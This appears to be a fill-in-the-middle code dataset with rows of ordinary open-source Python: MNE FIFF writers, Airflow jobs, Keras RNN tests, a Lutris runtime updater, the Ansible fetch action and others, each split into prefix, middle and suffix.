| repo_name (string, 5-100 chars) | path (string, 4-231 chars) | language (string, 1 class) | license (string, 15 classes) | size (int64, 6-947k) | score (float64, 0-0.34) | prefix (string, 0-8.16k chars) | middle (string, 3-512 chars) | suffix (string, 0-8.17k chars) |
|---|---|---|---|---|---|---|---|---|
effigies/mne-python | mne/io/write.py | Python | bsd-3-clause | 14,593 | 0.001576 | # Authors: Alexandre Gramfort <alexandre.gramfort@telecom-paristech.fr>
# Matti Hamalainen <msh@nmr.mgh.harvard.edu>
#
# License: BSD (3-clause)
from ..externals.six import string_types, b
import time
import numpy as np
from scipy import linalg
import os.path as op
import re
import uuid
from .constants import FIFF
from ..utils import logger
from ..externals.jdcal import jcal2jd
from ..fixes import gzip_open
def _write(fid, data, kind, data_size, FIFFT_TYPE, dtype):
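# Each FIFF tag is written as four big-endian int32 header fields
# (kind, data type, data size, 'next' pointer), followed by the raw payload.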
if isinstance(data, np.ndarray):
data_size *= data.size
# XXX for string types the data size is used as
# computed in ``write_string``.
fid.write(np.array(kind, dtype='>i4').tostring())
fid.write(np.array(FIFFT_TYPE, dtype='>i4').tostring())
fid.write(np.array(data_size, dtype='>i4').tostring())
fid.write(np.array(FIFF.FIFFV_NEXT_SEQ, dtype='>i4').tostring())
fid.write(np.array(data, dtype=dtype).tostring())
def write_int(fid, kind, data):
"""Writes a 32-bit integer tag to a fif file"""
data_size = 4
data = np.array(data, dtype='>i4').T
_write(fid, data, kind, data_size, FIFF.FIFFT_INT, '>i4')
def write_double(fid, kind, data):
"""Writes a double-precision floating point tag to a fif file"""
data_size = 8
data = np.array(data, dtype='>f8').T
_write(fid, data, kind, data_size, FIFF.FIFFT_DOUBLE, '>f8')
def write_float(fid, kind, data):
"""Writes a single-precision floating point tag to a fif file"""
data_size = 4
data = np.array(data, dtype='>f4').T
_write(fid, data, kind, data_size, FIFF.FIFFT_FLOAT, '>f4')
def write_dau_pack16(fid, kind, data):
"""Writes a dau_pack16 tag to a fif file"""
data_size = 2
data = np.array(data, dtype='>i2').T
_write(fid, data, kind, data_size, FIFF.FIFFT_DAU_PACK16, '>i2')
def write_complex64(fid, kind, data):
"""Writes a 64 bit complex floating point tag to a fif file"""
data_size = 8
data = np.array(data, dtype='>c8').T
_write(fid, data, kind, data_size, FIFF.FIFFT_COMPLEX_FLOAT, '>c8')
def write_complex128(fid, kind, data):
"""Writes a 128 bit complex floating point tag to a fif file"""
data_size = 16
data = np.array(data, dtype='>c16').T
_write(fid, data, kind, data_size, FIFF.FIFFT_COMPLEX_DOUBLE, '>c16')
def write_julian(fid, kind, data):
"""Writes a Julian-formatted date to a FIF file"""
assert len(data) == 3
data_size = 4
jd = np.sum(jcal2jd(*data))
data = np.array(jd, dtype='>i4')
_write(fid, data, kind, data_size, FIFF.FIFFT_JULIAN, '>i4')
def write_string(fid, kind, data):
"""Writes a string tag"""
str_data = data.encode('utf-8') # Use unicode or bytes depending on Py2/3
data_size = len(str_data) # therefore compute size here
my_dtype = '>a' # py2/3 compatible on writing -- don't ask me why
_write(fid, str_data, kind, data_size, FIFF.FIFFT_STRING, my_dtype)
def write_name_list(fid, kind, data):
"""Writes a colon-separated list of names
Parameters
----------
data : list of strings
"""
write_string(fid, kind, ':'.join(data))
def write_float_matrix(fid, kind, mat):
"""Writes a single-precision floating-point matrix tag"""
FIFFT_MATRIX = 1 << 30
FIFFT_MATRIX_FLOAT = FIFF.FIFFT_FLOAT | FIFFT_MATRIX
data_size = 4 * mat.size + 4 * (mat.ndim + 1)
fid.write(np.array(kind, dtype='>i4').tostring())
fid.write(np.array(FIFFT_MATRIX_FLOAT, dtype='>i4').tostring())
fid.write(np.array(data_size, dtype='>i4').tostring())
fid.write(np.array(FIFF.FIFFV_NEXT_SEQ, dtype='>i4').tostring())
fid.write(np.array(mat, dtype='>f4').tostring())
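# Matrix tags end with a dimension block: the shape in reversed (column-major)
# order followed by the number of dimensions.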
dims = np.empty(mat.ndim + 1, dtype=np.int32)
dims[:mat.ndim] = mat.shape[::-1]
dims[-1] = mat.ndim
fid.write(np.array(dims, dtype='>i4').tostring())
def write_double_matrix(fid, kind, mat):
"""Writes a double-precision floating-point matrix tag"""
FIFFT_MATRIX = 1 << 30
FIFFT_MATRIX_DOUBLE = FIFF.FIFFT_DOUBLE | FIFFT_MATRIX
data_size = 8 * mat.size + 4 * (mat.ndim + 1)
fid.write(np.array(kind, dtype='>i4').tostring())
fid.write(np.array(FIFFT_MATRIX_DOUBLE, dtype='>i4').tostring())
fid.write(np.array(data_size, dtype='>i4').tostring())
fid.write(np.array(FIFF.FIFFV_NEXT_SEQ, dtype='>i4').tostring())
fid.write(np.array(mat, dtype='>f8').tostring())
dims = np.empty(mat.ndim + 1, dtype=np.int32)
dims[:mat.ndim] = mat.shape[::-1]
dims[-1] = mat.ndim
fid.write(np.array(dims, dtype='>i4').tostring())
def write_int_matrix(fid, kind, mat):
"""Writes integer 32 matrix tag"""
FIFFT_MATRIX = 1 << 30
FIFFT_MATRIX_INT = FIFF.FIFFT_INT | FIFFT_MATRIX
data_size = 4 * mat.size + 4 * 3
fid.write(np.array(kind, dtype='>i4').tostring())
fid.write(np.array(FIFFT_MATRIX_INT, dtype='>i4').tostring())
fid.write(np.array(data_size, dtype='>i4').tostring())
fid.write(np.array(FIFF.FIFFV_NEXT_SEQ, dtype='>i4').tostring())
fid.write(np.array(mat, dtype='>i4').tostring())
dims = np.empty(3, dtype=np.int32)
dims[0] = mat.shape[1]
dims[1] = mat.shape[0]
dims[2] = 2
fid.write(np.array(dims, dtype='>i4').tostring())
def get_machid():
"""Get (mostly) unique machine ID
Returns
-------
ids : array (length 2, int32)
The machine identifier used in MNE.
"""
mac = b('%012x' %uuid.getnode()) # byte conversion for Py3
mac = re.findall(b'..', mac) # split string
mac += [b'00', b'00'] # add two more fields
# Convert to integer in reverse-order (for some reason)
from codecs import encode
mac = b''.join([encode(h, 'hex_codec') for h in mac[::-1]])
ids = np.flipud(np.fromstring(mac, np.int32, count=2))
return ids
def write_id(fid, kind, id_=None):
"""Writes fiff id"""
id_ = _generate_meas_id() if id_ is None else id_
FIFFT_ID_STRUCT = 31
FIFFV_NEXT_SEQ = 0
data_size = 5 * 4 # The id comprises five integers
fid.write(np.array(kind, dtype='>i4').tostring())
fid.write(np.array(FIFFT_ID_STRUCT, dtype='>i4').tostring())
fid.write(np.array(data_size, dtype='>i4').tostring())
fid.write(np.array(FIFFV_NEXT_SEQ, dtype='>i4').tostring())
# Collect the bits together for one write
data = np.empty(5, dtype=np.int32)
data[0] = id_['version']
data[1] = id_['machid'][0]
data[2] = id_['machid'][1]
data[3] = id_['secs']
data[4] = id_['usecs']
fid.write(np.array(data, dtype='>i4').tostring())
def start_block(fid, kind):
"""Writes a FIFF_BLOCK_START tag"""
write_int(fid, FIFF.FIFF_BLOCK_START, kind)
def end_block(fid, kind):
"""Writes a FIFF_BLOCK_END tag"""
write_int(fid, FIFF.FIFF_BLOCK_END, kind)
def start_file(fname, id_=None):
"""Opens a fif file for writing and writes the compulsory header tags
Parameters
----------
fname : string | fid
The name of the file to open. It is recommended
that the name ends with .fif or .fif.gz. Can also be an
already opened file.
id_ : dict | None
ID to use for the FIFF_FILE_ID.
"""
if isinstance(fname, string_types):
if op.splitext(fname)[1].lower() == '.gz':
logger.debug('Writing using gzip')
# defaults to compression level 9, which is barely smaller but much
# slower. 2 offers a good compromise.
fid = gzip_open(fname, "wb", compresslevel=2)
else:
logger.debug('Writing using normal I/O')
fid = open(fname, "wb")
else:
logger.debug('Writing using %s I/O' % type(fname))
fid = fname
fid.seek(0)
# Write the compulsory items
write_id(fid, FIFF.FIFF_FILE_ID, id_)
write_int(fid, FIFF.FIFF_DIR_POINTER, -1)
write_int(fid, FIFF.FIFF_FREE_LIST, -1)
return fid
def end_file(fid):
"""Writes the closing tags to a fif file and closes the file"""
data_size = 0
fid.write(np.array(FIFF.FIFF_NOP, dtype='>i4').tostring())
fid.write(np.array(FIFF.FIFFT_VOID, dtype='>i4').tostring())
fid.write(np.array(data_size, dtype='>i4').tostring())
fid.write(np.arra |
hamedhsn/incubator-airflow | airflow/jobs.py | Python | apache-2.0 | 90,563 | 0.001391 | # -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from past.builtins import basestring
from collections import defaultdict, Counter
from datetime import datetime
import getpass
import logging
import socket
import multiprocessing
import os
import signal
import six
import sys
import threading
import time
from time import sleep
import psutil
from sqlalchemy import Column, Integer, String, DateTime, func, Index, or_, and_
from sqlalchemy import update
from sqlalchemy.exc import OperationalError
from sqlalchemy.orm.session import make_transient
from tabulate import tabulate
from airflow import executors, models, settings
from airflow import configuration as conf
from airflow.exceptions import AirflowException
from airflow.models import DAG, DagRun
from airflow.settings import Stats
from airflow.task_runner import get_task_runner
from airflow.ti_deps.dep_context import DepContext, QUEUE_DEPS, RUN_DEPS
from airflow.utils.state import State
from airflow.utils.db import provide_session, pessimistic_connection_handling
from airflow.utils.dag_processing import (AbstractDagFileProcessor,
DagFileProcessorManager,
SimpleDag,
SimpleDagBag,
list_py_file_paths)
from airflow.utils.email import send_email
from airflow.utils.logging import LoggingMixin
from airflow.utils import asciiart
Base = models.Base
ID_LEN = models.ID_LEN
class BaseJob(Base, LoggingMixin):
"""
Abstract class to be derived for jobs. Jobs are processing items with state
and duration that aren't task instances. For instance a BackfillJob is
a collection of task instance runs, but should have its own state, start
and end time.
"""
__tablename__ = "job"
id = Column(Integer, primary_key=True)
dag_id = Column(String(ID_LEN),)
state = Column(String(20))
job_type = Column(String(30))
start_date = Column(DateTime())
end_date = Column(DateTime())
latest_heartbeat = Column(DateTime())
executor_class = Column(String(500))
hostname = Column(String(500))
unixname = Column(String(1000))
__mapper_args__ = {
'polymorphic_on': job_type,
'polymorphic_identity': 'BaseJob'
}
__table_args__ = (
Index('job_type_heart', job_type, latest_heartbeat),
)
def __init__(
self,
executor=executors.GetDefaultExecutor(),
heartrate=conf.getfloat('scheduler', 'JOB_HEARTBEAT_SEC'),
*args, **kwargs):
self.hostname = socket.getfqdn()
self.executor = executor
self.executor_class = executor.__class__.__name__
self.start_date = datetime.now()
self.latest_heartbeat = datetime.now()
self.heartrate = heartrate
self.unixname = getpass.getuser()
super(BaseJob, self).__init__(*args, **kwargs)
def is_alive(self):
return (
(datetime.now() - self.latest_heartbeat).seconds <
(conf.getint('scheduler', 'JOB_HEARTBEAT_SEC') * 2.1)
)
def kill(self):
session = settings.Session()
job = session.query(BaseJob).filter(BaseJob.id == self.id).first()
job.end_date = datetime.now()
try:
self.on_kill()
except:
self.logger.error('on_kill() method failed')
session.merge(job)
session.commit()
session.close()
raise AirflowException("Job shut down externally.")
def on_kill(self):
'''
Will be called when an external kill command is received
'''
pass
def heartbeat_callback(self, session=None):
pass
def heartbeat(self):
'''
Heartbeats update the job's entry in the database with a timestamp
for the latest_heartbeat and allows for the job to be killed
externally. This allows at the system level to monitor what is
actually active.
For instance, an old heartbeat for SchedulerJob would mean something
is wrong.
This also allows for any job to be killed externally, regardless
of who is running it or on which machine it is running.
Note that if your heartbeat is set to 60 seconds and you call this
method after 10 seconds of processing since the last heartbeat, it
will sleep 50 seconds to complete the 60 seconds and keep a steady
heart rate. If you go over 60 seconds before calling it, it won't
sleep at all.
'''
session = settings.Session()
job = session.query(BaseJob).filter_by(id=self.id).one()
make_transient(job)
session.commit()
session.close()
if job.state == State.SHUTDOWN:
self.kill()
# Figure out how long to sleep for
sleep_for = 0
if job.latest_heartbeat:
sleep_for = max(
0,
self.heartrate - (datetime.now() - job.latest_heartbeat).total_seconds())
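# e.g. with heartrate=60 and 10 s elapsed since the last heartbeat, sleep_for is 50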
# Don't keep session open while sleeping as it leaves a connection open
session.close()
sleep(sleep_for)
# Update last heartbeat time
session = settings.Session()
job = session.query(BaseJob).filter(BaseJob.id == self.id).first()
job.latest_heartbeat = datetime.now()
session.merge(job)
session.commit()
self.heartbeat_callback(session=session)
session.close()
self.logger.debug('[heart] Boom.')
def run(self):
Stats.incr(self.__class__.__name__.lower() + '_start', 1, 1)
# Adding an entry in the DB
session = settings.Session()
self.state = State.RUNNING
session.add(self)
session.commit()
id_ = self.id
make_transient(self)
self.id = id_
# Run
self._execute()
# Marking the success in the DB
self.end_date = datetime.now()
self.state = State.SUCCESS
session.merge(self)
session.commit()
session.close()
Stats.incr(self.__class__.__name__.lower() + '_end', 1, 1)
def _execute(self):
raise NotImplementedError("This method needs to be overridden")
@provide_session
def reset_state_for_orphaned_tasks(self, dag_run, session=None):
"""
This function checks for a DagRun if there are any tasks
that have a scheduled state but are not known by the
executor. If it finds those it will reset the state to None
so they will get picked up again.
"""
queued_tis = self.executor.queued_tasks
# also consider running as the state might not have changed in the db yet
running = self.executor.running
tis = list()
tis.extend(dag_run.get_task_instances(state=State.SCHEDULED, session=session))
tis.extend(dag_run.get_task_instances(state=State.QUEUED, session=session))
for ti in tis:
if ti.key not in queued_tis and ti.key not in running:
self.logger.debug("Rescheduling orphaned task {}".format(ti))
ti.state = State.NONE
session.commit()
class DagFileProcessor(AbstractDagFileProcessor):
"""Helps call SchedulerJob.process_file() in a separate process."""
# Counter that increments every time an instance of this class is created
class_creation_counter = 0
def __init__(self, file_path, pickle_dags, dag_id_wh |
Kankroc/pdf2image | pdf2image/__init__.py | Python | mit | 106 | 0.009434 | """
__init__ of the pdf2image module
"""
from .pdf2image import convert_from_bytes, convert_from_path |
Bismarrck/tensorflow | tensorflow/python/keras/layers/simplernn_test.py | Python | apache-2.0 | 7,269 | 0.002339 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for SimpleRNN layer."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python import keras
from tensorflow.python.framework import test_util as tf_test_util
from tensorflow.python.keras import keras_parameterized
from tensorflow.python.keras import testing_utils
from tensorflow.python.platform import test
from tensorflow.python.training import gradient_descent
from tensorflow.python.training.rmsprop import RMSPropOptimizer
@keras_parameterized.run_all_keras_modes
class SimpleRNNLayerTest(keras_parameterized.TestCase):
def test_return_sequences_SimpleRNN(self):
num_samples = 2
timesteps = 3
embedding_dim = 4
units = 2
testing_utils.layer_test(
keras.layers.SimpleRNN,
kwargs={'units': units,
'return_sequences': True},
input_shape=(num_samples, timesteps, embedding_dim))
def test_dynamic_behavior_SimpleRNN(self):
num_samples = 2
timesteps = 3
embedding_dim = 4
units = 2
layer = keras.layers.SimpleRNN(units, input_shape=(None, embedding_dim))
model = keras.models.Sequential()
model.add(layer)
model.compile(RMSPropOptimizer(0.01), 'mse')
x = np.random.random((num_samples, timesteps, embedding_dim))
y = np.random.random((num_samples, units))
model.train_on_batch(x, y)
def test_dropout_SimpleRNN(self):
num_samples = 2
timesteps = 3
embedding_dim = 4
units = 2
testing_utils.layer_test(
keras.layers.SimpleRNN,
kwargs={'units': units,
'dropout': 0.1,
'recurrent_dropout': 0.1},
input_shape=(num_samples, timesteps, embedding_dim))
def test_implementation_mode_SimpleRNN(self):
num_samples = 2
timesteps = 3
embedding_dim = 4
units = 2
for mode in [0, 1, 2]:
testing_utils.layer_test(
keras.layers.SimpleRNN,
kwargs={'units': units,
'implementation': mode},
input_shape=(num_samples, timesteps, embedding_dim))
def test_constraints_SimpleRNN(self):
embedding_dim = 4
layer_class = keras.layers.SimpleRNN
k_constraint = keras.constraints.max_norm(0.01)
r_constraint = keras.constraints.max_norm(0.01)
b_constraint = keras.constraints.max_norm(0.01)
layer = layer_class(
5,
return_sequences=False,
weights=None,
input_shape=(None, embedding_dim),
kernel_constraint=k_constraint,
recurrent_constraint=r_constraint,
bias_constraint=b_constraint)
layer.build((None, None, embedding_dim))
self.assertEqual(layer.cell.kernel.constraint, k_constraint)
self.assertEqual(layer.cell.recurrent_kernel.constraint, r_constraint)
self.assertEqual(layer.cell.bias.constraint, b_constraint)
def test_with_masking_layer_SimpleRNN(self):
layer_class = keras.layers.SimpleRNN
inputs = np.random.random((2, 3, 4))
targets = np.abs(np.random.random((2, 3, 5)))
targets /= targets.sum(axis=-1, keepdims=True)
model = keras.models.Sequential()
model.add(keras.layers.Masking(input_shape=(3, 4)))
model.add(layer_class(units=5, return_sequences=True, unroll=False))
model.compile(loss='categorical_crossentropy',
optimizer=RMSPropOptimizer(0.01))
model.fit(inputs, targets, epochs=1, batch_size=2, verbose=1)
def test_from_config_SimpleRNN(self):
layer_class = keras.layers.SimpleRNN
for stateful in (False, True):
l1 = layer_class(units=1, stateful=stateful)
l2 = layer_class.from_config(l1.get_config())
assert l1.get_config() == l2.get_config()
def test_statefulness_SimpleRNN(self):
num_samples = 2
timesteps = 3
embedding_dim = 4
units = 2
layer_class = keras.layers.SimpleRNN
model = keras.models.Sequential()
model.add(
keras.layers.Embedding(
4,
embedding_dim,
mask_zero=True,
input_length=timesteps,
batch_input_shape=(num_samples, timesteps)))
layer = layer_class(
units, return_sequences=False, stateful=True, weights=None)
model.add(layer)
model.compile(optimizer=gradient_descent.GradientDescentOptimizer(0.01),
loss='mse')
out1 = model.predict(np.ones((num_samples, timesteps)))
self.assertEqual(out1.shape, (num_samples, units))
# train once so that the states change
model.train_on_batch(
np.ones((num_samples, timesteps)), np.ones((num_samples, units)))
out2 = model.predict(np.ones((num_samples, timesteps)))
# if the state is not reset, output should be different
self.assertNotEqual(out1.max(), out2.max())
# check that output changes after states are reset
# (even though the model itself didn't change)
layer.reset_states()
out3 = model.predict(np.ones((num_samples, timesteps)))
self.assertNotEqual(out2.max(), out3.max())
# check that container-level reset_states() works
model.reset_states()
out4 = model.predict(np.ones((num_samples, timesteps)))
np.testing.assert_allclose(out3, out4, atol=1e-5)
# check that the call to `predict` updated the states
out5 = model.predict(np.ones((num_samples, timesteps)))
self.assertNotEqual(out4.max(), out5.max())
# Check masking
layer.reset_states()
left_padded_input = np.ones((num_samples, timesteps))
left_padded_input[0, :1] = 0
left_padded_input[1, :2] = 0
out6 = model.predict(left_padded_input)
layer.reset_states()
right_padded_input = np.ones((num_samples, timesteps))
right_padded_input[0, -1:] = 0
right_padded_input[1, -2:] = 0
out7 = model.predict(right_padded_input)
np.testing.assert_allclose(out7, out6, atol=1e-5)
class SimpleRNNLayerGraphOnlyTest(test.TestCase):
# b/120919032
@tf_test_util.run_deprecated_v1
def test_regularizers_SimpleRNN(self):
embedding_dim = 4
layer_class = keras.layers.SimpleRNN
layer = layer_class(
5,
return_sequences=False,
weights=None,
input_shape=(None, embedding_dim),
kernel_regularizer=keras.regularizers.l1(0.01),
recurrent_regularizer=keras.regularizers.l1(0.01),
bias_regularizer='l2',
activity_regularizer='l1')
layer.build((None, None, 2))
self.assertEqual(len(layer.losses), 3)
x = keras.backend.variable(np.ones((2, 3, 2)))
layer(x)
self.assertEqual(len(layer.get_losses_for(x)), 1)
if __name__ == '__main__':
test.main()
|
Thortoise/Super-Snake | Blender/animation_nodes-master/nodes/spline/splines_from_edges.py | Python | gpl-3.0 | 752 | 0.006649 | import bpy
from ... base_types.node import AnimationNode
from ... data_structures.splines.poly_spline import PolySpline
class SplinesFromEdgesNode(bpy.types.Node, AnimationNode):
bl_idname = "an_SplinesFromEdgesNode"
bl_label = "Splines from Edges"
def create(self):
self.newInput("Vector List", "Vertices", "vertices", dataIsModified = True)
self.newInput("Edge Indices List", "Edge Indices", "edgeIndices")
self.newOutput("Spline List", "Splines" | , "splines")
def execute(self, vertices, edgeIndices):
splines = []
for index1, index2 in edgeIndices:
spline = PolySpline.fromLocations([vertices[index1], vertices[index2]])
splines.append(spline)
return splines
|
malkavi/lutris | lutris/util/runtime.py | Python | gpl-3.0 | 1,774 | 0 | import os
from lutris.util import http
from lutris.util import extract
from lutris import settings
LOCAL_VERSION_PATH = os.path.join(settings.RUNTIME_DIR, "VERSION")
def parse_version(version_content):
try:
version = int(version_content)
except ValueError:
version = 0
return version
def get_local_version():
if not os.path.exists(LOCAL_VERSION_PATH):
return 0
with open(LOCAL_VERSION_PATH, 'r') as version_file:
version_content = version_file.read().strip()
return parse_version(version_content)
def get_remote_version():
version_url = settings.RUNTIME_URL + "VERSION"
version_content = http.download_content(version_url)
return parse_version(version_content)
def update_runtime():
remote_version = get_remote_version()
local_version = get_local_version()
if remote_version <= local_version:
return
runtime32_file = "lutris-runtime-i386.tar.gz"
runtime64_file = "lutris-runtime-amd64.tar.gz"
runtime32_path = os.path.join(settings.RUNTIME_DIR, runtime32_file)
http.download_asset(settings.RUNTIME_URL + runtime32_file, runtime32_path,
overwrite=True)
runtime64_path = os.path.join(settings.RUNTIME_DIR, runtime64_file)
http.download_asset(settings.RUNTIME_URL + runtime64_file, runtime64_path,
overwrite=True)
extract.extract_archive(runtime32_path, settings.RUNTIME_DIR,
merge_single=False)
extract.extract_archive(runtime64_path, settings.RUNTIME_DIR,
merge_single=False)
os.unlink(runtime32_path)
os.unlink(runtime64_path)
with open(LOCAL_VERSION_PATH, 'w') as version_file:
version_file.write(str(remote_version))
|
wehkamp/ansible | lib/ansible/plugins/action/fetch.py | Python | gpl-3.0 | 7,278 | 0.003572 | # (c) 2012-2014, Michael DeHaan <michael.dehaan@gmail.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import pwd
import random
import traceback
import tempfile
import base64
from ansible import constants as C
from ansible.errors import *
from ansible.plugins.action import ActionBase
from ansible.utils.boolean import boolean
from ansible.utils.hashing import checksum, checksum_s, md5, secure_hash
from ansible.utils.path import makedirs_safe
class ActionModule(ActionBase):
def run(self, tmp=None, task_vars=dict()):
''' handler for fetch operations '''
# FIXME: is this even required anymore?
#if self.runner.noop_on_check(inject):
# return ReturnData(conn=conn, comm_ok=True, result=dict(skipped=True, msg='check mode not (yet) supported for this module'))
source = self._task.args.get('src', None)
dest = self._task.args.get('dest', None)
flat = boolean(self._task.args.get('flat'))
fail_on_missing = boolean(self._task.args.get('fail_on_missing'))
validate_checksum = boolean(self._task.args.get('validate_checksum', self._task.args.get('validate_md5')))
if 'validate_md5' in self._task.args and 'validate_checksum' in self._task.args:
return dict(failed=True, msg="validate_checksum and validate_md5 cannot both be specified")
if source is None or dest is None:
return dict(failed=True, msg="src and dest are required")
source = self._shell.join_path(source)
source = self._remote_expand_user(source, tmp)
# calculate checksum for the remote file
remote_checksum = self._remote_checksum(tmp, source)
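# _remote_checksum returns single-character status codes ('0'-'4') when no
# checksum could be computed (missing file, unreadable, directory, no python);
# these cases are handled further below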
# use slurp if sudo and permissions are lacking
remote_data = None
if remote_checksum in ('1', '2') or self._connection_info.become:
slurpres = self._execute_module(module_name='slurp', module_args=dict(src=source), task_vars=task_vars, tmp=tmp)
if slurpres.get('rc') == 0:
if slurpres['encoding'] == 'base64':
remote_data = base64.b64decode(slurpres['content'])
if remote_data is not None:
remote_checksum = checksum_s(remote_data)
# the source path may have been expanded on the
# target system, so we compare it here and use the
# expanded version if it's different
remote_source = slurpres.get('source')
if remote_source and remote_source != source:
source = remote_source
else:
# FIXME: should raise an error here? the old code did nothing
pass
# calculate the destination name
if os.path.sep not in self._shell.join_path('a', ''):
source_local = source.replace('\\', '/')
else:
source_local = source
dest = os.path.expanduser(dest)
if flat:
if dest.endswith(os.sep):
# if the path ends with "/", we'll use the source filename as the
# destination filename
base = os.path.basename(source_local)
dest = os.path.join(dest, base)
if not dest.startswith("/"):
# if dest does not start with "/", we'll assume a relative path
dest = self._loader.path_dwim(dest)
else:
# files are saved in dest dir, with a subdir for each host, then the filename
if 'inventory_hostname' in task_vars:
target_name = task_vars['inventory_hostname']
else:
target_name = self._connection_info.remote_addr
dest = "%s/%s/%s" % (self._loader.path_dwim(dest), target_name, source_local)
dest = dest.replace("//","/")
if remote_checksum in ('0', '1', '2', '3', '4'):
# these don't fail because you may want to transfer a log file that possibly MAY exist
# but keep going to fetch other log files
if remote_checksum == '0':
result = dict(msg="unable to calculate the checksum of the remote file", file=source, changed=False)
elif remote_checksum == '1':
if fail_on_missing:
result = dict(failed=True, msg="the remote file does not exist", file=source)
else:
result = dict(msg="the remote file does not exist, not transferring, ignored", file=source, changed=False)
elif remote_checksum == '2':
result = dict(msg="no read permission on remote file, not transferring, ignored", file=source, changed=False)
elif remote_checksum == '3':
result = dict(msg="remote file is a directory, fetch cannot work on directories", file=source, changed=False)
elif remote_checksum == '4':
result = dict(msg="python isn't present on the system. Unable to compute checksum", file=source, changed=False)
return result
# calculate checksum for the local file
local_checksum = checksum(dest)
if remote_checksum != local_checksum:
# create the containing directories, if needed
makedirs_safe(os.path.dirname(dest))
# fetch the file and check for changes
if remote_data is None:
self._connection.fetch_file(source, dest)
else:
f = open(dest, 'w')
f.write(remote_data)
f.close()
new_checksum = secure_hash(dest)
# For backwards compatibility. We'll return None on FIPS enabled
# systems
try:
new_md5 = md5(dest)
except ValueError:
new_md5 = None
if validate_checksum and new_checksum != remote_checksum:
return dict(failed=True, md5sum=new_md5, msg="checksum mismatch", file=source, dest=dest, remote_md5sum=None, checksum=new_checksum, remote_checksum=remote_checksum)
return dict(changed=True, md5sum=new_md5, dest=dest, remote_md5sum=None, checksum=new_checksum, remote_checksum=remote_checksum)
else:
# For backwards compatibility. We'll return None on FIPS enabled
# systems
try:
local_md5 = md5(dest)
except ValueError:
local_md5 = None
return dict(changed=False, md5sum=local_md5, file=source, dest=dest, checksum=local_checksum)
|
bbirand/python-driver | benchmarks/callback_full_pipeline.py | Python | apache-2.0 | 1,906 | 0.000525 | # Copyright 2013-2015 DataStax, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from itertools import count
from threading import Event
from base import benchmark, BenchmarkThread
from six.moves import range
log = logging.getLogger(__name__)
sentinel = object()
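# unique marker that lets insert_next() tell the initial call apart from
# callback invocations that carry an actual query result or exception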
class Runner(BenchmarkThread):
def __init__(self, *args, **kwargs):
BenchmarkThread.__init__(self, *args, **kwargs)
self.num_started = count()
self.num_finished = count()
self.event = Event()
def insert_next(self, previous_result=sentinel):
if previous_result is not sentinel:
if isinstance(previous_result, BaseException):
log.error("Error on insert: %r", previous_result)
if next(self.num_finished) >= self.num_queries:
self.event.set()
if next(self.num_started) <= self.num_queries:
future = self.session.execute_async(self.query, self.values, timeout=None)
future.add_callbacks(self.insert_next, self.insert_next)
def run(self):
self.start_profile()
if self.protocol_version >= 3:
concurrency = 1000
else:
concurrency = 100
for _ in range(min(concurrency, self.num_queries)):
self.insert_next()
self.event.wait()
self.finish_profile()
if __name__ == "__main__":
benchmark(Runner)
|
AlexeyKruglov/Skeinforge-fabmetheus | skeinforge_application/skeinforge_plugins/analyze_plugins/statistic.py | Python | agpl-3.0 | 17,518 | 0.031225 | """
This page is in the table of contents.
Statistic is an extremely valuable analyze plugin to print and/or save the statistics of the generated gcode.
The statistic manual page is at:
http://fabmetheus.crsndoo.com/wiki/index.php/Skeinforge_Statistic
==Operation==
The default 'Activate Statistic' checkbox is on. When it is on, the functions described below will work when called from the skeinforge toolchain; when it is off, the functions will not be called from the toolchain. The functions will still be called, whether or not the 'Activate Statistic' checkbox is on, when statistic is run directly.
==Settings==
===Print Statistics===
Default is on.
When the 'Print Statistics' checkbox is on, the statistics will be printed to the console.
===Save Statistics===
Default is off.
When the 'Save Statistics' checkbox is on, the statistics will be saved as a .txt file.
==Gcodes==
An explanation of the gcodes is at:
http://reprap.org/bin/view/Main/Arduino_GCode_Interpreter
and at:
http://reprap.org/bin/view/Main/MCodeReference
A gcode example is at:
http://forums.reprap.org/file.php?12,file=565
==Examples==
Below are examples of statistic being used. These examples are run in a terminal in the folder which contains Screw Holder_penultimate.gcode and statistic.py. The 'Save Statistics' checkbox is selected.
> python statistic.py
This brings up the statistic dialog.
> python statistic.py Screw Holder_penultimate.gcode
Statistics are being generated for the file /home/enrique/Desktop/backup/babbleold/script/reprap/fabmetheus/models/Screw Holder_penultimate.gcode
Cost
Machine time cost is 0.31$.
Material cost is 0.2$.
Total cost is 0.51$.
Extent
X axis extrusion starts at 61 mm and ends at 127 mm, for a width of 65 mm.
Y axis extrusion starts at 81 mm and ends at 127 mm, for a depth of 45 mm.
Z axis extrusion starts at 0 mm and ends at 15 mm, for a height of 15 mm.
Extruder
